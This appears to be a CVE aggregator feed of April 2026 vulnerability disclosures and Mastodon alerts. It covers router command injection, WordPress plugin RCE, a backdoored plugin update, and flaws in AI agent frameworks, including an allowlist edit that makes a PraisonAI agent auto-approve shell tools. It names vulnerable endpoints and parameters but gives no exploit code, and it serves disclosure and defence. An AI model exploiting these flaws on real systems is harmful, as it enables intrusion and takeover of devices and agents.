🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-35625
(7.8 HIGH)

EPSS: 0.03%

updated 2026-04-10T00:30:37

1 posts

OpenClaw before 2026.3.25 contains a privilege escalation vulnerability where silent local shared-auth reconnects auto-approve scope-upgrade requests, widening paired device permissions from operator.read to operator.admin. Attackers can exploit this by triggering local reconnection to silently escalate privileges and achieve remote code execution on the node.

thehackerwire@mastodon.social at 2026-04-10T05:54:06.000Z ##

🟠 CVE-2026-35625 - High (7.8)

OpenClaw before 2026.3.25 contains a privilege escalation vulnerability where silent local shared-auth reconnects auto-approve scope-upgrade requests, widening paired device permissions from operator.read to operator.admin. Attackers can exploit t...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-35645
(8.1 HIGH)

EPSS: 0.03%

updated 2026-04-10T00:30:37

1 posts

OpenClaw before 2026.3.25 contains a privilege escalation vulnerability in the gateway plugin subagent fallback deleteSession function that uses a synthetic operator.admin runtime scope. Attackers can exploit this by triggering session deletion without a request-scoped client to execute privileged operations with unintended administrative scope.

thehackerwire@mastodon.social at 2026-04-10T05:00:26.000Z ##

🟠 CVE-2026-35645 - High (8.1)

OpenClaw before 2026.3.25 contains a privilege escalation vulnerability in the gateway plugin subagent fallback deleteSession function that uses a synthetic operator.admin runtime scope. Attackers can exploit this by triggering session deletion wi...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-33788
(7.8 HIGH)

EPSS: 0.02%

updated 2026-04-10T00:30:30

1 posts

A Missing Authentication for Critical Function vulnerability in the Flexible PIC Concentrators (FPCs) of Juniper Networks Junos OS Evolved on PTX Series allows a local, authenticated attacker with low privileges to gain direct access to FPCs installed in the device. A local user with low privileges can gain direct access to the installed FPCs as a high privileged user, which can potentially lead

thehackerwire@mastodon.social at 2026-04-10T06:00:17.000Z ##

🟠 CVE-2026-33788 - High (7.8)

A Missing Authentication for Critical Function vulnerability in the Flexible PIC Concentrators (FPCs) of Juniper Networks Junos OS Evolved on PTX Series allows a local, authenticated attacker with low privileges to gain direct access to FPCs insta...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5990
(8.8 HIGH)

EPSS: 0.05%

updated 2026-04-10T00:16:36.363000

1 posts

A vulnerability has been found in Tenda F451 1.0.0.7. Affected by this vulnerability is the function fromSafeEmailFilter of the file /goform/SafeEmailFilter. The manipulation of the argument page leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.

thehackerwire@mastodon.social at 2026-04-10T03:45:16.000Z ##

🟠 CVE-2026-5990 - High (8.8)

A vulnerability has been found in Tenda F451 1.0.0.7. Affected by this vulnerability is the function fromSafeEmailFilter of the file /goform/SafeEmailFilter. The manipulation of the argument page leads to stack-based buffer overflow. The attack ma...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-34424
(9.8 CRITICAL)

EPSS: 0.15%

updated 2026-04-09T23:17:00.540000

2 posts

Smart Slider 3 Pro version 3.5.1.35 for WordPress and Joomla contains a multi-stage remote access toolkit injected through a compromised update system that allows unauthenticated attackers to execute arbitrary code and commands. Attackers can trigger pre-authentication remote shell execution via HTTP headers, establish authenticated backdoors accepting arbitrary PHP code or OS commands, create hid

thehackerwire@mastodon.social at 2026-04-10T04:00:03.000Z ##

🔴 CVE-2026-34424 - Critical (9.8)

Smart Slider 3 Pro version 3.5.1.35 for WordPress and Joomla contains a multi-stage remote access toolkit injected through a compromised update system that allows unauthenticated attackers to execute arbitrary code and commands. Attackers can trig...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
offseq@infosec.exchange at 2026-04-10T00:00:38.000Z ##

⚠️ CVE-2026-34424 (CRITICAL): Smart Slider 3 Pro 3.5.1.35 for WordPress/Joomla has embedded malicious code via a compromised update system. Unauth RCE, backdoors, hidden admins, data exfil possible. Remove plugin & monitor. No fix yet. radar.offseq.com/threat/cve-20 #OffSeq #WordPress #Infosec

##

CVE-2026-5984
(8.8 HIGH)

EPSS: 0.02%

updated 2026-04-09T22:16:37.873000

1 posts

A vulnerability was identified in D-Link DIR-605L 2.13B01. Impacted is the function formSetLog of the file /goform/formSetLog of the component POST Request Handler. The manipulation of the argument curTime leads to buffer overflow. The attack is possible to be carried out remotely. The exploit is publicly available and might be used. This vulnerability only affects products that are no longer supp

thehackerwire@mastodon.social at 2026-04-10T04:03:34.000Z ##

🟠 CVE-2026-5984 - High (8.8)

A vulnerability was identified in D-Link DIR-605L 2.13B01. Impacted is the function formSetLog of the file /goform/formSetLog of the component POST Request Handler. The manipulation of the argument curTime leads to buffer overflow. The attack is p...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-40154
(9.3 CRITICAL)

EPSS: 0.03%

updated 2026-04-09T22:16:36.503000

2 posts

PraisonAI is a multi-agent teams system. Prior to 4.5.128, PraisonAI treats remotely fetched template files as trusted executable code without integrity verification, origin validation, or user confirmation, enabling supply chain attacks through malicious templates. This vulnerability is fixed in 4.5.128.

Matchbook3469@mastodon.social at 2026-04-10T23:04:20.000Z ##

🔴 New security advisory:

CVE-2026-40154 affects multiple systems.

• Impact: Remote code execution or complete system compromise possible
• Risk: Attackers can gain full control of affected systems
• Mitigation: Patch immediately or isolate affected systems

Full breakdown:
yazoul.net/advisory/cve/cve-20

#Cybersecurity #SecurityPatching #HackerNews

##
thehackerwire@mastodon.social at 2026-04-10T04:32:34.000Z ##

🔴 CVE-2026-40154 - Critical (9.3)

PraisonAI is a multi-agent teams system. Prior to 4.5.128, PraisonAI treats remotely fetched template files as trusted executable code without integrity verification, origin validation, or user confirmation, enabling supply chain attacks through m...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-40149
(7.9 HIGH)

EPSS: 0.01%

updated 2026-04-09T22:16:35.750000

1 posts

PraisonAI is a multi-agent teams system. Prior to 4.5.128, the gateway's /api/approval/allow-list endpoint permits unauthenticated modification of the tool approval allowlist when no auth_token is configured (the default). By adding dangerous tool names (e.g., shell_exec, file_write) to the allowlist, an attacker can cause the ExecApprovalManager to auto-approve all future agent invocations of tho

thehackerwire@mastodon.social at 2026-04-10T04:32:53.000Z ##

🟠 CVE-2026-40149 - High (7.9)

PraisonAI is a multi-agent teams system. Prior to 4.5.128, the gateway's /api/approval/allow-list endpoint permits unauthenticated modification of the tool approval allowlist when no auth_token is configured (the default). By adding dangerous tool...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-35639
(8.8 HIGH)

EPSS: 0.20%

updated 2026-04-09T22:16:33.317000

1 posts

OpenClaw before 2026.3.22 contains a privilege escalation vulnerability in the device.pair.approve method that allows an operator.pairing approver to approve pending device requests with broader operator scopes than the approver actually holds. Attackers can exploit insufficient scope validation to escalate privileges to operator.admin and achieve remote code execution on the Node infrastructure.

thehackerwire@mastodon.social at 2026-04-10T05:53:55.000Z ##

🟠 CVE-2026-35639 - High (8.8)

OpenClaw before 2026.3.22 contains a privilege escalation vulnerability in the device.pair.approve method that allows an operator.pairing approver to approve pending device requests with broader operator scopes than the approver actually holds. At...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-34512
(8.1 HIGH)

EPSS: 0.03%

updated 2026-04-09T22:16:29.757000

1 posts

OpenClaw before 2026.3.25 contains an improper access control vulnerability in the HTTP /sessions/:sessionKey/kill route that allows any bearer-authenticated user to invoke admin-level session termination functions without proper scope validation. Attackers can exploit this by sending authenticated requests to kill arbitrary subagent sessions via the killSubagentRunAdmin function, bypassing owners

thehackerwire@mastodon.social at 2026-04-10T06:00:05.000Z ##

🟠 CVE-2026-34512 - High (8.1)

OpenClaw before 2026.3.25 contains an improper access control vulnerability in the HTTP /sessions/:sessionKey/kill route that allows any bearer-authenticated user to invoke admin-level session termination functions without proper scope validation....

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-33784
(9.8 CRITICAL)

EPSS: 0.04%

updated 2026-04-09T22:16:27.820000

1 posts

A Use of Default Password vulnerability in the Juniper Networks Support Insights (JSI) Virtual Lightweight Collector (vLWC) allows an unauthenticated, network-based attacker to take full control of the device. vLWC software images ship with an initial password for a high privileged account. A change of this password is not enforced during the provisioning of the software, which can make full

thehackerwire@mastodon.social at 2026-04-10T06:08:10.000Z ##

🔴 CVE-2026-33784 - Critical (9.8)

A Use of Default Password vulnerability in the Juniper Networks

Support Insights (JSI)

Virtual Lightweight Collector (vLWC) allows an unauthenticated, network-based attacker to take full control of the device.

vLWC software images ship with a...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-13914
(8.7 HIGH)

EPSS: 0.03%

updated 2026-04-09T22:16:22.697000

1 posts

A Key Exchange without Entity Authentication vulnerability in the SSH implementation of Juniper Networks Apstra allows a unauthenticated, MITM attacker to impersonate managed devices. Due to insufficient SSH host key validation an attacker can perform a machine-in-the-middle attack on the SSH connections from Apstra to managed devices, enabling an attacker to impersonate a managed device and ca

thehackerwire@mastodon.social at 2026-04-10T06:11:33.000Z ##

🟠 CVE-2025-13914 - High (8.7)

A Key Exchange without Entity Authentication vulnerability in the SSH implementation of Juniper Networks Apstra allows a unauthenticated, MITM

attacker to impersonate managed devices.

Due to insufficient SSH host key validation an attacker can ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5978
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-09T21:31:37

1 posts

A security vulnerability has been detected in Totolink A7100RU 7.4cu.2313_b20191024. Affected is the function setWiFiAclRules of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument mode leads to os command injection. The attack can be initiated remotely. The exploit has been disclosed publicly and may be used.

thehackerwire@mastodon.social at 2026-04-10T07:07:47.000Z ##

🔴 CVE-2026-5978 - Critical (9.8)

A security vulnerability has been detected in Totolink A7100RU 7.4cu.2313_b20191024. Affected is the function setWiFiAclRules of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument mode leads to os command ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5977
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-09T21:31:37

1 posts

A weakness has been identified in Totolink A7100RU 7.4cu.2313_b20191024. This impacts the function setWiFiBasicCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Executing a manipulation of the argument wifiOff can lead to os command injection. It is possible to launch the attack remotely. The exploit has been made available to the public and could be used for attacks.

thehackerwire@mastodon.social at 2026-04-10T07:07:37.000Z ##

🔴 CVE-2026-5977 - Critical (9.8)

A weakness has been identified in Totolink A7100RU 7.4cu.2313_b20191024. This impacts the function setWiFiBasicCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Executing a manipulation of the argument wifiOff can lead to os comma...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5980
(8.8 HIGH)

EPSS: 0.04%

updated 2026-04-09T21:31:37

1 posts

A flaw has been found in D-Link DIR-605L 2.13B01. Affected by this issue is the function formSetMACFilter of the file /goform/formSetMACFilter of the component POST Request Handler. This manipulation of the argument curTime causes buffer overflow. The attack may be initiated remotely. The exploit has been published and may be used. This vulnerability only affects products that are no longer suppor

thehackerwire@mastodon.social at 2026-04-10T06:11:43.000Z ##

🟠 CVE-2026-5980 - High (8.8)

A flaw has been found in D-Link DIR-605L 2.13B01. Affected by this issue is the function formSetMACFilter of the file /goform/formSetMACFilter of the component POST Request Handler. This manipulation of the argument curTime causes buffer overflow....

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5975
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-09T21:31:36

1 posts

A vulnerability was identified in Totolink A7100RU 7.4cu.2313_b20191024. The impacted element is the function setDmzCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Such manipulation of the argument wanIdx leads to os command injection. The attack may be performed from remote. The exploit is publicly available and might be used.

thehackerwire@mastodon.social at 2026-04-10T07:08:25.000Z ##

🔴 CVE-2026-5975 - Critical (9.8)

A vulnerability was identified in Totolink A7100RU 7.4cu.2313_b20191024. The impacted element is the function setDmzCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Such manipulation of the argument wanIdx leads to os command inj...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5979
(8.8 HIGH)

EPSS: 0.04%

updated 2026-04-09T21:16:13.967000

1 posts

A vulnerability was detected in D-Link DIR-605L 2.13B01. Affected by this vulnerability is the function formVirtualServ of the file /goform/formVirtualServ of the component POST Request Handler. The manipulation of the argument curTime results in buffer overflow. The attack can be launched remotely. The exploit is now public and may be used. This vulnerability only affects products that are no lon

thehackerwire@mastodon.social at 2026-04-10T07:07:56.000Z ##

🟠 CVE-2026-5979 - High (8.8)

A vulnerability was detected in D-Link DIR-605L 2.13B01. Affected by this vulnerability is the function formVirtualServ of the file /goform/formVirtualServ of the component POST Request Handler. The manipulation of the argument curTime results in ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5976
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-09T20:16:29.763000

1 posts

A security flaw has been discovered in Totolink A7100RU 7.4cu.2313_b20191024. This affects the function setStorageCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Performing a manipulation of the argument sambaEnabled results in os command injection. It is possible to initiate the attack remotely. The exploit has been released to the public and may be used for attacks.

thehackerwire@mastodon.social at 2026-04-10T07:08:35.000Z ##

🔴 CVE-2026-5976 - Critical (9.8)

A security flaw has been discovered in Totolink A7100RU 7.4cu.2313_b20191024. This affects the function setStorageCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Performing a manipulation of the argument sambaEnabled results in ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-39987
(0 None)

EPSS: 2.70%

updated 2026-04-09T18:17:02.807000

2 posts

marimo is a reactive Python notebook. Prior to 0.23.0, Marimo has a Pre-Auth RCE vulnerability. The terminal WebSocket endpoint /terminal/ws lacks authentication validation, allowing an unauthenticated attacker to obtain a full PTY shell and execute arbitrary system commands. Unlike other WebSocket endpoints (e.g., /ws) that correctly call validate_auth() for authentication, the /terminal/ws endpo

Nuclei template

beyondmachines1 at 2026-04-11T08:01:09.743Z ##

Marimo Python Notebook RCE Exploited Hours After Disclosure

Marimo patched a critical RCE vulnerability (CVE-2026-39987) that was exploited within 10 hours of disclosure to steal cloud credentials and SSH keys. The flaw allows unauthenticated attackers to gain full interactive shell access via a WebSocket authentication bypass.

**If you're running Marimo notebooks, update to version 0.23.0 immediately and rotate any credentials (AWS keys, SSH keys, database passwords, API secrets) that were stored on or accessible from that system. If you can't update right away, block access to the /terminal/ws endpoint or put the notebook behind a reverse proxy with authentication and never expose notebook platforms directly to the internet.**

beyondmachines.net/event_detai

##
beyondmachines1@infosec.exchange at 2026-04-11T08:01:09.000Z ##

Marimo Python Notebook RCE Exploited Hours After Disclosure

Marimo patched a critical RCE vulnerability (CVE-2026-39987) that was exploited within 10 hours of disclosure to steal cloud credentials and SSH keys. The flaw allows unauthenticated attackers to gain full interactive shell access via a WebSocket authentication bypass.

**If you're running Marimo notebooks, update to version 0.23.0 immediately and rotate any credentials (AWS keys, SSH keys, database passwords, API secrets) that were stored on or accessible from that system. If you can't update right away, block access to the /terminal/ws endpoint or put the notebook behind a reverse proxy with authentication and never expose notebook platforms directly to the internet.**
#cybersecurity #infosec #attack #activeexploit
beyondmachines.net/event_detai

##

CVE-2026-39885
(7.5 HIGH)

EPSS: 0.03%

updated 2026-04-09T14:29:54

1 posts

## Summary The `mcp-from-openapi` library uses `@apidevtools/json-schema-ref-parser` to dereference `$ref` pointers in OpenAPI specifications without configuring any URL restrictions or custom resolvers. A malicious OpenAPI specification containing `$ref` values pointing to internal network addresses, cloud metadata endpoints, or local files will cause the library to fetch those resources during

thehackerwire@mastodon.social at 2026-04-09T05:00:17.000Z ##

🟠 CVE-2026-39885 - High (7.5)

FrontMCP is a TypeScript-first framework for the Model Context Protocol (MCP). Prior to 2.3.0, the mcp-from-openapi library uses @apidevtools/json-schema-ref-parser to dereference $ref pointers in OpenAPI specifications without configuring any URL...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-39891
(8.8 HIGH)

EPSS: 0.05%

updated 2026-04-09T14:29:51

2 posts

## Summary Direct insertion of unescaped user input into template-rendering tools allows arbitrary code execution via specially crafted agent instructions. ## Details The `create_agent_centric_tools()` function returns tools (like `acp_create_file`) that process file content using template rendering. When user input from `agent.start()` is passed directly into these tools without escaping (as show

thehackerwire@mastodon.social at 2026-04-09T04:35:53.000Z ##

🟠 CVE-2026-39891 - High (8.8)

PraisonAI is a multi-agent teams system. Prior to 4.5.115, the create_agent_centric_tools() function returns tools (like acp_create_file) that process file content using template rendering. When user input from agent.start() is passed directly int...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-09T04:19:59.000Z ##

🟠 CVE-2026-39891 - High (8.8)

PraisonAI is a multi-agent teams system. Prior to 4.5.115, the create_agent_centric_tools() function returns tools (like acp_create_file) that process file content using template rendering. When user input from agent.start() is passed directly int...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-39890
(9.8 CRITICAL)

EPSS: 0.29%

updated 2026-04-09T14:29:47

1 posts

## Summary The `AgentService.loadAgentFromFile` method uses the `js-yaml` library to parse YAML files without disabling dangerous tags (such as `!!js/function` and `!!js/undefined`). This allows an attacker to craft a malicious YAML file that, when parsed, executes arbitrary JavaScript code. An attacker can exploit this vulnerability by uploading a malicious agent definition file via the API endpo

thehackerwire@mastodon.social at 2026-04-09T04:19:54.000Z ##

🔴 CVE-2026-39890 - Critical (9.8)

PraisonAI is a multi-agent teams system. Prior to 4.5.115, the AgentService.loadAgentFromFile method uses the js-yaml library to parse YAML files without disabling dangerous tags (such as !!js/function and !!js/undefined). This allows an attacker ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-39889
(7.5 HIGH)

EPSS: 0.04%

updated 2026-04-09T14:29:17

2 posts

The A2U (Agent-to-User) event stream server in PraisonAI exposes all agent activity without authentication. This is a separate component from the gateway server fixed in CVE-2026-34952. The create_a2u_routes() function registers the following endpoints with NO authentication checks: - GET /a2u/info — exposes server info and stream names - POST /a2u/subscribe — creates event stream subscri

thehackerwire@mastodon.social at 2026-04-09T04:35:43.000Z ##

🟠 CVE-2026-39889 - High (7.5)

PraisonAI is a multi-agent teams system. Prior to 4.5.115, the A2U (Agent-to-User) event stream server in PraisonAI exposes all agent activity without authentication. The create_a2u_routes() function registers the following endpoints with NO authe...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
thehackerwire@mastodon.social at 2026-04-09T04:19:49.000Z ##

🟠 CVE-2026-39889 - High (7.5)

PraisonAI is a multi-agent teams system. Prior to 4.5.115, the A2U (Agent-to-User) event stream server in PraisonAI exposes all agent activity without authentication. The create_a2u_routes() function registers the following endpoints with NO authe...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-39429
(8.2 HIGH)

EPSS: 0.07%

updated 2026-04-09T14:28:53

1 posts

### Summary The cache server is directly exposed by the root shard and has no authentication or authorization in place. This allows anyone who can access the root shard to read and write to the cache server. ### Details The cache server is routed in the pre-mux chain in the shard code. The preHandlerChainMux is handled before any authn/authz in the cache server: https://github.com/kcp-dev/kcp

thehackerwire@mastodon.social at 2026-04-09T05:00:42.000Z ##

🟠 CVE-2026-39429 - High (8.2)

kcp is a Kubernetes-like control plane for form-factors and use-cases beyond Kubernetes and container workloads. Prior to 0.30.3 and 0.29.3, the cache server is directly exposed by the root shard and has no authentication or authorization in place...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2024-1490
(7.2 HIGH)

EPSS: 0.08%

updated 2026-04-09T12:31:22

1 posts

An authenticated remote attacker with high privileges can exploit the OpenVPN configuration via the web-based management interface of a WAGO PLC. If user-defined scripts are permitted, OpenVPN may allow the execution of arbitrary shell commands enabling the attacker to run arbitrary commands on the device.

certvde@infosec.exchange at 2026-04-09T10:58:20.000Z ##

#OT #Advisory VDE-2024-008
Wago: Vulnerability in WBM through Open VPN

A security vulnerability has been identified in the Web-Based Management (WBM) function when OpenVPN is enabled.
#CVE CVE-2024-1490

certvde.com/en/advisories/vde-
#oCSAF
#CSAF wago.csaf-tp.certvde.com/.well

##

CVE-2026-5852
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-09T09:31:56

1 posts

A weakness has been identified in Totolink A7100RU 7.4cu.2313_b20191024. Affected is the function setIptvCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. This manipulation of the argument igmpVer causes os command injection. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be used for attacks.

thehackerwire@mastodon.social at 2026-04-09T07:39:10.000Z ##

🔴 CVE-2026-5852 - Critical (9.8)

A weakness has been identified in Totolink A7100RU 7.4cu.2313_b20191024. Affected is the function setIptvCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. This manipulation of the argument igmpVer causes os command injection. The ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5854
(9.8 CRITICAL)

EPSS: 0.23%

updated 2026-04-09T09:31:56

1 posts

A vulnerability was detected in Totolink A7100RU 7.4cu.2313_b20191024. Affected by this issue is the function setWiFiEasyCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Performing a manipulation of the argument merge results in os command injection. It is possible to initiate the attack remotely. The exploit is now public and may be used.

thehackerwire@mastodon.social at 2026-04-09T07:39:00.000Z ##

🔴 CVE-2026-5854 - Critical (9.8)

A vulnerability was detected in Totolink A7100RU 7.4cu.2313_b20191024. Affected by this issue is the function setWiFiEasyCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Performing a manipulation of the argument merge results in ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5853
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-09T07:16:05.273000

1 posts

A security vulnerability has been detected in Totolink A7100RU 7.4cu.2313_b20191024. Affected by this vulnerability is the function setIpv6LanCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Such manipulation of the argument addrPrefixLen leads to os command injection. The attack may be performed from remote. The exploit has been disclosed publicly and may be used.

thehackerwire@mastodon.social at 2026-04-09T07:38:51.000Z ##

🔴 CVE-2026-5853 - Critical (9.8)

A security vulnerability has been detected in Totolink A7100RU 7.4cu.2313_b20191024. Affected by this vulnerability is the function setIpv6LanCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Such manipulation of the argument addr...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5850
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-09T06:30:36

2 posts

A vulnerability was identified in Totolink A7100RU 7.4cu.2313_b20191024. This affects the function setVpnPassCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument pptpPassThru leads to os command injection. Remote exploitation of the attack is possible. The exploit is publicly available and might be used.

offseq@infosec.exchange at 2026-04-09T09:00:51.000Z ##

🛑 CRITICAL: CVE-2026-5850 in Totolink A7100RU (fw 7.4cu.2313_b20191024) enables unauthenticated OS command injection via pptpPassThru. No patch yet — restrict access & monitor advisories. radar.offseq.com/threat/cve-20 #OffSeq #CVE20265850 #RouterSecurity #Infosec

##
thehackerwire@mastodon.social at 2026-04-09T06:37:44.000Z ##

🔴 CVE-2026-5850 - Critical (9.8)

A vulnerability was identified in Totolink A7100RU 7.4cu.2313_b20191024. This affects the function setVpnPassCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument pptpPassThru leads to os command injec...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5851
(9.8 CRITICAL)

EPSS: 0.89%

updated 2026-04-09T06:30:35

2 posts

A security flaw has been discovered in Totolink A7100RU 7.4cu.2313_b20191024. This impacts the function setUPnPCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument enable results in os command injection. The attack can be executed remotely. The exploit has been released to the public and may be used for attacks.

offseq@infosec.exchange at 2026-04-09T07:30:28.000Z ##

🔒 CVE-2026-5851: CRITICAL OS command injection in Totolink A7100RU (7.4cu.2313_b20191024). Remote, unauthenticated RCE possible via /cgi-bin/cstecgi.cgi. Exploit public, no patch. Isolate device and check for updates! radar.offseq.com/threat/cve-20 #OffSeq #CVE20265851 #IoTSec

##
thehackerwire@mastodon.social at 2026-04-09T06:37:54.000Z ##

🔴 CVE-2026-5851 - Critical (9.8)

A security flaw has been discovered in Totolink A7100RU 7.4cu.2313_b20191024. This impacts the function setUPnPCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument enable results in os command injecti...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-1830
(9.8 CRITICAL)

EPSS: 0.18%

updated 2026-04-09T06:30:35

2 posts

The Quick Playground plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.3.1. This is due to insufficient authorization checks on REST API endpoints that expose a sync code and allow arbitrary file uploads. This makes it possible for unauthenticated attackers to retrieve the sync code, upload PHP files with path traversal, and achieve remote code exe

thehackerwire@mastodon.social at 2026-04-09T05:17:09.000Z ##

🔴 CVE-2026-1830 - Critical (9.8)

The Quick Playground plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.3.1. This is due to insufficient authorization checks on REST API endpoints that expose a sync code and allow arbitrary file u...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##
offseq@infosec.exchange at 2026-04-09T04:30:27.000Z ##

🚨 CVE-2026-1830: CRITICAL RCE in davidfcarr Quick Playground (WordPress ≤1.3.1). Unauthenticated users can upload PHP files via REST API flaw — patch or disable plugin now! radar.offseq.com/threat/cve-20 #OffSeq #WordPress #Infosec #CVE20261830

##

CVE-2026-5844
(7.2 HIGH)

EPSS: 0.19%

updated 2026-04-09T05:16:06.653000

1 posts

A vulnerability was found in D-Link DIR-882 1.01B02. Impacted is the function sprintf of the file prog.cgi of the component HNAP1 SetNetworkSettings Handler. The manipulation of the argument IPAddress results in os command injection. The attack may be performed from remote. The exploit has been made public and could be used. This vulnerability only affects products that are no longer supported by

offseq@infosec.exchange at 2026-04-09T06:00:27.000Z ##

🔒 CVE-2026-5844: HIGH-severity OS command injection in D-Link DIR-882 (v1.01B02). Remote attackers can execute arbitrary OS commands. No official fix — upgrade or restrict remote access. Details: radar.offseq.com/threat/cve-20 #OffSeq #DLink #Vuln #RouterSecurity

##

CVE-2026-4326
(8.8 HIGH)

EPSS: 0.08%

updated 2026-04-09T03:31:24

1 posts

The Vertex Addons for Elementor plugin for WordPress is vulnerable to Missing Authorization in all versions up to and including 1.6.4. This is due to improper authorization enforcement in the activate_required_plugins() function. Specifically, the current_user_can('install_plugins') capability check does not terminate execution when it fails — it only sets an error message variable while allowing

thehackerwire@mastodon.social at 2026-04-09T03:00:29.000Z ##

🟠 CVE-2026-4326 - High (8.8)

The Vertex Addons for Elementor plugin for WordPress is vulnerable to Missing Authorization in all versions up to and including 1.6.4. This is due to improper authorization enforcement in the activate_required_plugins() function. Specifically, the...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-5830
(8.8 HIGH)

EPSS: 0.05%

updated 2026-04-09T03:31:24

1 posts

A vulnerability was identified in Tenda AC15 15.03.05.18. This affects the function websGetVar of the file /goform/SysToolChangePwd. Such manipulation of the argument oldPwd/newPwd/cfmPwd leads to stack-based buffer overflow. The attack can be executed remotely. The exploit is publicly available and might be used.

thehackerwire@mastodon.social at 2026-04-09T03:00:16.000Z ##

🟠 CVE-2026-5830 - High (8.8)

A vulnerability was identified in Tenda AC15 15.03.05.18. This affects the function websGetVar of the file /goform/SysToolChangePwd. Such manipulation of the argument oldPwd/newPwd/cfmPwd leads to stack-based buffer overflow. The attack can be exe...

🔗 thehackerwire.com/vulnerabilit

